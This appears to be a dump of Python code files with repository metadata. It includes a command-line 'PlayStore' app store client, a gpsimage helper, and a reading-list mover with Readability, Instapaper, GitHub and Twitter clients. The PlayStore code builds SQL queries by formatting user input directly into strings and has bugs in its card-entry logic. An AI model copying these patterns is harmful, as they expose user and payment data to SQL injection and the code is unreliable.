"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "checkbox",
"message": "Select book you want to purchase",
"name": "purchase",
"choices": [],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select genre from which you want to purchase book",
"name": "genre",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": ['1', '2', '3', '4', '5'],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "my library":
books = db.downloaded_book(a1["userid"], False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any books in your library!"
)
)
sys.exit()
q3[0]["message"] = "Select books if you want to give feedback"
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] != []:
for i in a3["purchase"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
s = db.feedback(a1["userid"], books[i], a8["rating"], a8["comment"])
print(s)
sys.exit()
elif a2["option"] == "search books":
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q2 = [
{
"type": "list",
"message": "Select category from which you want to wishlist/unwishlist book.",
"name": "option",
"choices": [
{"name": "remove wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "search books"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select book you want to add to wishlist",
"name": "purchase",
"choices": [],
}
]
q3 = [
{
"type": "checkbox",
"message": "Select genre from which you want to add book to your wishlist",
"name": "category",
"choices": [],
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "remove wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.wishlist(a1["userid"], books[i], False)
if not s:
puts(colored.red("Book can't be added to wishlist because book is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
sys.exit()
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.download(a1["userid"], books[i], isApp=False)
if not s:
puts(
colored.red(
"{} is a paid book, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], books[i], pays.get(a7["payment"]), isApp=False)
print(s)
if s:
puts(colored.green("{} added to your library successfully.".format(i)))
else:
puts(colored.green("{} added to your library successfully.".format(i)))
elif a1["product"] == "Account":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": ["add payment method", "edit user details", "delete account"],
}
]
q3 = [
{
"type": "list",
"message": "Select payment method you want to add",
"name": "option",
"choices": ["credit card", "debit card", "ewallet", "netbanking"],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select fields you want to update",
"name": "option",
"choices": ["userid", "username", "country", "autoupdate"]
}
]
q6 = [
{
"type": "confirm",
"message": "Are you sure you want to delete your account.",
"name": "option",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "add payment method":
a3 = prompt(q3, style=style)
d = {}
if a3["option"] in {"credit card", "debit card"}:
for i in ("name", "expdate", "cardno"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_card(d["name"], a1["userid"], d["expdate"], d["cardno"], "".join(a3["option"].split()))
elif a3["option"] == "ewallet":
for i in ("name", "walletid"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_wallet(a1["userid"], d["name"], d["walletid"])
else:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format("bank name")
a5 = prompt(q5, style=style)
db.add_netbank(a1["userid"], a5["option"])
elif a2["option"] == "edit user details":
a4 = prompt(q4, style=style)
if a4["option"] != []:
ans = []
for i in a4["option"]:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
ans.append(a5["option"])
kwargs = dict([a4["option"], ans])
db.update("users", "userid='{}'".format(a1["userid"]), **kwargs)
else:
a6 = prompt(q6, style=style)
if a6["option"]:
db.delete("users", userid=a1["userid"])
| from __future__ import print_function, unicode_literals
import itertools
import sys
from clint.textui import colored, indent, puts
from pyfiglet import figlet_format as figlet
from PyInquirer import Separator, Token, prompt, style_from_dict
from playstore import PlayStore
def convert(val, ans):
if "int" in val:
return int(ans)
elif "numeric" in val:
return float(ans)
elif "bool" == val:
return True if ans == "true" else False
else:
return ans
db = PlayStore()
puts(colored.green(figlet("PlayStore")))
style = style_from_dict(
{
Token.Separator: "#<PASSWORD>",
Token.QuestionMark: "#<PASSWORD>",
Token.Selected: "#<PASSWORD>", # default
Token.Pointer: "#<PASSWORD> bold",
Token.Instruction: "#<PASSWORD>", # default
Token.Answer: "#<PASSWORD> bold",
Token.Question: "#<PASSWORD>",
}
)
q1 = [
{
"type": "input",
"message": "Enter your userid (email)",
"name": "userid",
"validate": lambda text: len(text) != 0 or "Enter a valid userid",
},
{
"type": "list",
"message": "Select option",
"name": "product",
"choices": [{"name": "App"}, {"name": "Book"}, {"name": "Account"}],
"validate": lambda answer: "You must choose a product."
if len(answer) == 0
else True,
},
]
a1 = prompt(q1, style=style)
if a1["product"] == "App":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [{"name": "Install"}, {"name": "Update"}, {"name": "Uninstall"}, {"name": "Wishlist"}],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "previously installed apps"},
{"name": "wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to install",
"name": "install",
"choices": [],
}
]
q5 = [
{
"type": "checkbox",
"message": "Select category from which you want to install app",
"name": "category",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": [1, 2, 3, 4, 5],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
dcommand = {"Uninstall": False, "Update": True, "Feedback": True}
a2 = prompt(q2, style=style)
if a2["option"] == "Install":
a3 = prompt(q3, style=style)
if a3["option"] == "previously installed apps":
apps = db.downloaded_app(a1["userid"], False, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in previously installed apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
apps = dict(apps)
if apps == {}:
puts(
colored.red(
"You don't have any app in wishlisted apps!"
)
)
sys.exit()
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i])
if not s:
puts(
colored.red(
"{} is a paid app, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], apps[i], pays.get(a7["payment"]))
if s:
puts(colored.green("{} downloaded successfully.".format(i)))
else:
puts(colored.red("download of {} failed. may be because your card has been expired".format(i)))
else:
puts(colored.green("{} downloaded successfully.".format(i)))
elif a2["option"] in dcommand:
apps = db.downloaded_app(a1["userid"], True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
q4[0]["message"] = "Select app you want to {}".format(a2["option"])
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a2["option"] == "Feedback":
for i in a4["install"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
db.feedback(a1["userid"], apps[i], a8["rating"], a8["comment"])
else:
for i in a4["install"]:
s = db.download(a1["userid"], apps[i], install=dcommand[a2["option"]])
puts(colored.green("{} {}ed successfully.".format(i, a2["option"])))
elif a2["option"] == "Wishlist":
q3 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": [
{"name": "remove wishlisted apps"},
{"name": "trending apps"},
{"name": "best rated apps"},
{"name": "category wise apps"},
{"name": "search apps"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select app you want to add to/(remove from) wishlist ",
"name": "install",
"choices": [],
}
]
a3 = prompt(q3, style=style)
if a3["option"] == "remove wishlisted apps":
apps = db.get_wishlist(a1["userid"], True, False)
if apps == []:
puts(colored.red("Your wishlist is empty!"))
sys.exit()
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "trending apps":
apps = db.trending(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "best rated apps":
apps = db.best_rated(True, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
elif a3["option"] == "category wise apps":
cats = db.get_category()
for i in itertools.chain.from_iterable(cats):
q5[0]["choices"].append({"name": i})
a5 = prompt(q5, style=style)
for i in a5["category"]:
apps = db.category_wise(i, False)
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the app",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("app", "appname, appid", where="name='{}'".format(a9["search"]), output=False)
apps = db.display_query(s, output=False)
if apps == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
apps = dict(apps)
for i in apps.keys():
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
if a4["install"] == []:
puts(colored.red("You have to select at least one app."))
elif a3["option"] == "remove wishlisted apps":
for i in a4["install"]:
db.remove_wishlist(a1["userid"], apps[i])
puts(colored.green("{} removed from wishlist successfully.".format(i)))
else:
for i in a4["install"]:
s = db.wishlist(a1["userid"], apps[i])
if not s:
puts(colored.red("App can't be added to wishlist because app is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
elif a1["product"] == "Book":
q2 = [
{
"type": "list",
"message": "Select category from which you want to show/purchase book.",
"name": "option",
"choices": [
{"name": "wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "my library"},
{"name": "search books"},
{"name": "wishlist books"},
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q3 = [
{
"type": "checkbox",
"message": "Select book you want to purchase",
"name": "purchase",
"choices": [],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select genre from which you want to purchase book",
"name": "genre",
"choices": [],
}
]
q6 = [
{
"type": "confirm",
"name": "buy",
"message": "Do you want to buy the app?",
"default": False,
}
]
q7 = [
{
"type": "list",
"message": "Select payment method",
"name": "payment",
"choices": [],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q8 = [
{
"type": "list",
"message": "Enter rating",
"name": "rating",
"choices": ['1', '2', '3', '4', '5'],
},
{
"type": "input",
"message": "Give Review",
"name": "comment",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "my library":
books = db.downloaded_book(a1["userid"], False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any books in your library!"
)
)
sys.exit()
q3[0]["message"] = "Select books if you want to give feedback"
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] != []:
for i in a3["purchase"]:
puts(colored.green(i))
a8 = prompt(q8, style=style)
s = db.feedback(a1["userid"], books[i], a8["rating"], a8["comment"])
print(s)
sys.exit()
elif a2["option"] == "search books":
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q2 = [
{
"type": "list",
"message": "Select category from which you want to wishlist/unwishlist book.",
"name": "option",
"choices": [
{"name": "remove wishlisted books"},
{"name": "best rated books"},
{"name": "genre wise books"},
{"name": "search books"}
],
"validate": lambda answer: "You must choose at least one option."
if len(answer) == 0
else True,
}
]
q4 = [
{
"type": "checkbox",
"message": "Select book you want to add to wishlist",
"name": "purchase",
"choices": [],
}
]
q3 = [
{
"type": "checkbox",
"message": "Select genre from which you want to add book to your wishlist",
"name": "category",
"choices": [],
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "remove wishlisted books":
books = db.get_wishlist(a1["userid"], False, False)
books = dict(books)
if books == {}:
puts(
colored.red(
"You don't have any book in wishlisted books!"
)
)
sys.exit()
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "best rated books":
books = db.best_rated(False, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
elif a2["option"] == "genre wise books":
cats = db.get_genre()
for i in itertools.chain.from_iterable(cats):
q4[0]["choices"].append({"name": i})
a4 = prompt(q4, style=style)
for i in a4["genre"]:
books = db.genre_wise(i, False)
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
else:
q9 = [
{
"type": "input",
"message": "Enter name of the book",
"name": "search",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
a9 = prompt(q9, style=style)
s = db.get("book", "name, isbn", where="name='{}'".format(a9["search"]), output=False)
books = db.display_query(s, output=False)
if books == []:
puts(
colored.red(
"{} does not exist in database.".format(a9["search"])
)
)
else:
books = dict(books)
for i in books.keys():
q3[0]["choices"].append({"name": i})
a3 = prompt(q3, style=style)
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.wishlist(a1["userid"], books[i], False)
if not s:
puts(colored.red("Book can't be added to wishlist because book is already downloaded/wishlisted."))
else:
puts(colored.green("{} added to wishlist successfully.".format(i)))
sys.exit()
if a3["purchase"] == []:
puts(colored.red("You have to select at least one book."))
else:
for i in a3["purchase"]:
s = db.download(a1["userid"], books[i], isApp=False)
if not s:
puts(
colored.red(
"{} is a paid book, you have to pay to download it".format(i)
)
)
a6 = prompt(q6, style=style)
pays = {}
if a6["buy"]:
for j in ("debitcard", "creditcard", "ewallet", "netbanking"):
q7[0]["choices"].append(Separator("= {} =".format(j)))
payments = db.get_payment(a1["userid"], j, False)
payments = dict(payments)
for k in payments.keys():
q7[0]["choices"].append({"name": k})
pays.update(dict(payments))
a7 = prompt(q7, style=style)
s = db.download(a1["userid"], books[i], pays.get(a7["payment"]), isApp=False)
print(s)
if s:
puts(colored.green("{} added to your library successfully.".format(i)))
else:
puts(colored.green("{} added to your library successfully.".format(i)))
elif a1["product"] == "Account":
q2 = [
{
"type": "list",
"message": "Select option",
"name": "option",
"choices": ["add payment method", "edit user details", "delete account"],
}
]
q3 = [
{
"type": "list",
"message": "Select payment method you want to add",
"name": "option",
"choices": ["credit card", "debit card", "ewallet", "netbanking"],
}
]
q4 = [
{
"type": "checkbox",
"message": "Select fields you want to update",
"name": "option",
"choices": ["userid", "username", "country", "autoupdate"]
}
]
q6 = [
{
"type": "confirm",
"message": "Are you sure you want to delete your account.",
"name": "option",
}
]
a2 = prompt(q2, style=style)
if a2["option"] == "add payment method":
a3 = prompt(q3, style=style)
d = {}
if a3["option"] in {"credit card", "debit card"}:
for i in ("name", "expdate", "cardno"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_card(d["name"], a1["userid"], d["expdate"], d["cardno"], "".join(a3["option"].split()))
elif a3["option"] == "ewallet":
for i in ("name", "walletid"):
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
d.update(i=a5["option"])
db.add_wallet(a1["userid"], d["name"], d["walletid"])
else:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format("bank name")
a5 = prompt(q5, style=style)
db.add_netbank(a1["userid"], a5["option"])
elif a2["option"] == "edit user details":
a4 = prompt(q4, style=style)
if a4["option"] != []:
ans = []
for i in a4["option"]:
q5 = [
{
"type": "input",
"message": "Enter {}",
"name": "option",
"validate": lambda text: len(text) != 0 or "Field can't be empty.",
}
]
q5[0]["message"] = q5[0]["message"].format(i)
a5 = prompt(q5, style=style)
ans.append(a5["option"])
kwargs = dict([a4["option"], ans])
db.update("users", "userid='{}'".format(a1["userid"]), **kwargs)
else:
a6 = prompt(q6, style=style)
if a6["option"]:
db.delete("users", userid=a1["userid"])
| fi | 0.049314 | # default # default | 3.105864 | 3 |
gpsimage/api.py | dima-kov/gpsimage | 4 | 6617383 | <reponame>dima-kov/gpsimage
#!/usr/bin/python
# coding: utf8
from .base import GPSImage
def open(path):
    """Open an image file and return a GPSImage wrapper around it.

    NOTE: this function shadows the builtin open() within this module;
    callers use it as ``gpsimage.open(path)``.

    :param path: Image filepath
    """
    return GPSImage(path)
# coding: utf8
from .base import GPSImage
def open(path):
    """Open an image file and return a GPSImage wrapper around it.

    NOTE: this function shadows the builtin open() within this module;
    callers use it as ``gpsimage.open(path)``.

    :param path: Image filepath
    """
    return GPSImage(path)
Trakttv.bundle/Contents/Tests/tests/helpers/__init__.py | disrupted/Trakttv.bundle | 1,346 | 6617384 | from tests.helpers.io import *
| from tests.helpers.io import *
| none | 1 | 1.049776 | 1 | |
main.py | ricardochavezt/reading-list-mover | 0 | 6617385 | <reponame>ricardochavezt/reading-list-mover<filename>main.py
import sys
import json
import urllib.request, urllib.error, urllib.parse
import simplejson
from xml.dom.minidom import parseString
import xml.dom.minidom
import oauth2
import configparser
from io import StringIO
import gzip
class OAuthClient:
    """Base client for xAuth-style OAuth1 services (Readability, Instapaper).

    Subclasses must assign ``token_url``, ``get_url`` and ``add_url`` before
    calling this initializer, because the xAuth token exchange reads
    ``token_url``.
    """

    def __init__(self, key, secret, user, password):
        consumer = oauth2.Consumer(key, secret)
        client = oauth2.Client(consumer)
        # Exchange the user's credentials for an access token (xAuth flow).
        resp, content = client.request(self.token_url, "POST", urllib.parse.urlencode({
            'x_auth_mode': 'client_auth',
            'x_auth_username': user,
            'x_auth_password': password
        }))
        token = dict(urllib.parse.parse_qsl(content.decode('UTF-8')))
        token = oauth2.Token(token['oauth_token'], token['oauth_token_secret'])
        # Signed client used for all subsequent API calls.
        self.http = oauth2.Client(consumer, token)

    def getBookmarks(self):
        """Return the service's bookmarks as dicts with 'url' and 'title'."""
        response, data = self.http.request(self.get_url, method='GET')
        # Parse the JSON payload once and extract each bookmark's article.
        bookmarks = []
        for entry in simplejson.loads(data)['bookmarks']:
            article = entry['article']
            bookmarks.append({'url': article['url'], 'title': article['title']})
        return bookmarks

    def addBookmark(self, bookmark):
        """POST *bookmark* (a dict with 'url' and 'title') to the service."""
        self.http.request(self.add_url, method='POST', body=urllib.parse.urlencode({
            'url': bookmark['url'],
            'title': bookmark['title'].encode('utf-8')
        }))
class Readability(OAuthClient):
    """Readability client; differs from other OAuth services only in its URLs.

    The URL attributes are assigned before the base initializer runs because
    OAuthClient.__init__ reads ``token_url`` to perform the xAuth exchange.
    """
    def __init__(self, key, secret, user, password):
        self.token_url = 'https://www.readability.com/api/rest/v1/oauth/access_token/'
        self.get_url = 'https://www.readability.com/api/rest/v1/bookmarks'
        self.add_url = 'https://www.readability.com/api/rest/v1/bookmarks'
        OAuthClient.__init__(self, key, secret, user, password)
class Instapaper(OAuthClient):
    """Instapaper client using the xAuth OAuth flow."""

    def __init__(self, key, secret, user, password):
        self.token_url = 'https://www.instapaper.com/api/1/oauth/access_token'
        self.get_url = 'https://www.instapaper.com/api/1/bookmarks/list?limit=500'
        self.add_url = 'https://www.instapaper.com/api/1/bookmarks/add'
        OAuthClient.__init__(self, key, secret, user, password)

    def getBookmarks(self):
        """Return the user's bookmarks, skipping non-bookmark records.

        The list endpoint mixes bookmark objects with meta/user records, so
        only entries whose 'type' is 'bookmark' are kept. (The original also
        left behind an unused empty list and parsed the payload into an
        unused intermediate; both removed.)
        """
        response, data = self.http.request(self.get_url, method='GET')
        return [{'url': b['url'], 'title': b['title']}
                for b in simplejson.loads(data) if b['type'] == 'bookmark']
class HttpAuthClient:
    """Base for services authenticated with HTTP basic auth.

    Subclasses must define ``get_url`` and ``add_url`` before calling this
    initializer: both URLs are registered with the password manager so the
    opener can answer authentication challenges for either endpoint.
    """

    def __init__(self, user, password):
        credentials = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        for endpoint in (self.get_url, self.add_url):
            credentials.add_password(None, endpoint, user, password)
        handler = urllib.request.HTTPBasicAuthHandler(credentials)
        self.url_opener = urllib.request.build_opener(handler)

    def open(self, url, data=None):
        """Open *url* through the authenticated opener (POST when *data* is given)."""
        return self.url_opener.open(url, data)
class StackOverflow:
    """Read-only client for a user's Stack Overflow favorites (Stack Exchange API v2.1)."""

    def __init__(self, user):
        # *user* is the numeric Stack Exchange user id, interpolated into the URL.
        self.get_url = 'http://api.stackexchange.com/2.1/users/' + user + '/favorites?order=desc&sort=activity&site=stackoverflow'

    def getBookmarks(self):
        """Return the user's favorite questions as bookmark dicts."""
        from io import BytesIO  # local import: the module level only imports StringIO
        rsp = urllib.request.urlopen(self.get_url)
        if rsp.info().get('Content-Encoding') == 'gzip':
            # BUG FIX: the response body is bytes; the original wrapped it in
            # StringIO, which raises TypeError on Python 3. gzip needs a
            # binary file object, so decompress from a BytesIO buffer.
            rsp = gzip.GzipFile(fileobj=BytesIO(rsp.read()))
        data = json.load(rsp)
        return [{'url': b['link'], 'title': b['title']} for b in data['items']]

    def addBookmark(self, bookmark):
        """Favoriting via this client is unsupported (read-only API usage)."""
        raise Exception('Not supported')
class Github:
    """Read-only client for the repositories a user has starred on GitHub."""

    def __init__(self, user):
        # Unauthenticated endpoint listing repositories starred by *user*.
        self.get_url = 'https://api.github.com/users/{}/starred'.format(user)

    def getBookmarks(self):
        """Return the starred repositories as bookmark dicts."""
        response = urllib.request.urlopen(self.get_url)
        payload = json.load(response)
        bookmarks = []
        for repo in payload:
            bookmarks.append({'url': repo['url'], 'title': repo['name']})
        return bookmarks

    def addBookmark(self, bookmark):
        """Starring via this client is unsupported (read-only API usage)."""
        raise Exception('Not supported')
class Twitter:
    """Reads a user's favorited tweets via the Twitter v1.1 REST API."""

    def __init__(self, user, api_key, api_secret, access_token, access_token_secret):
        self.get_url = "https://api.twitter.com/1.1/favorites/list.json?screen_name=" + user
        # Each favorite is linked back to its canonical tweet page.
        self.tweet_url_prefix = "https://twitter.com/" + user + "/status/"
        # OAuth1-signing client built from application and user credentials.
        consumer = oauth2.Consumer(api_key, api_secret)
        token = oauth2.Token(access_token, access_token_secret)
        self.http = oauth2.Client(consumer, token)

    def getBookmarks(self):
        """Return the user's favorites as bookmark dicts pointing at each tweet."""
        response, data = self.http.request(self.get_url, method='GET')
        return [{'url': self.tweet_url_prefix + tweet['id_str'], 'title': tweet['text']}
                for tweet in simplejson.loads(data)]

    def addBookmark(self, bookmark):
        """Favoriting via this client is unsupported (read-only API usage)."""
        raise Exception('Not supported')
class Diigo(HttpAuthClient):
